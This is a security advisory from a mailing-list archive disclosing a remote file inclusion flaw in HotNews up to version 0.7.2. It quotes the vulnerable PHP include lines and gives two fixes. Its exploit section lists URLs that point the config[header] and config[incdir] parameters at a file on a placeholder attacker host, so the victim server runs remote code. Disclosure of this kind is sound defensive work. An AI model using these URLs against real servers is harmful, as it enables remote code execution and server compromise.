<<< Date Index >>>     <<< Thread Index >>>

HotNews arbitary file inclusion



HotNews arbitary file inclusion.

===+++===+++===+++
Product: HotNews
Version: <= v0.7.2
Vendor: http://sourceforge.net/projects/hotnews/
Bug discovered by: Officerrr <officerrr@xxxxxxxxxxxxxx>
Vendor Response: Not contacted yet.
===+++===+++===+++


Problem #1:
===+++===+++===+++
Attacker can include any file from remote or local 
server.


PHP Code/Location #1:
===+++===+++===+++
-- from hotnews-engine.inc.php3
[...]
/*
// Init
$pagetitle = $config["pagename"];
if (!empty($config["header"])) {
  include($config["header"]);
}
[...]


PHP Code/Location #2:
===+++===+++===+++
-- from hnmain.inc.php3
[...]
// Init
include($config["incdir"] . "hndefs.inc.php3");
include($config["incdir"] . "func.inc.php3");
include($config["incdir"] . "getopts.inc.php3");
include($config["incdir"] . "db.".$config["db_type"].".inc.php3");
if (!$config["no_fasttpl"]) {
  include($config["incdir"] . "class.FastTemplate.php3");
}
include($config["incdir"] . "class.CachedFastTemplate.php3");
[...]

Exploit:
===+++===+++===+++
http://[victim]/includes/hotnews-engine.inc.php3?config[header]=http://[evil 
host]/[evil file]
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil 
host]/func.inc.php3
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil 
host]/hndefs.inc.php3
etc...


Fix #1:
===+++===+++===+++
Turn off global_variables.

Fix #2:
===+++===+++===+++
Use .htaccess to protect files in the 'includes' directory.


-- 
Pozdrawiam,
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"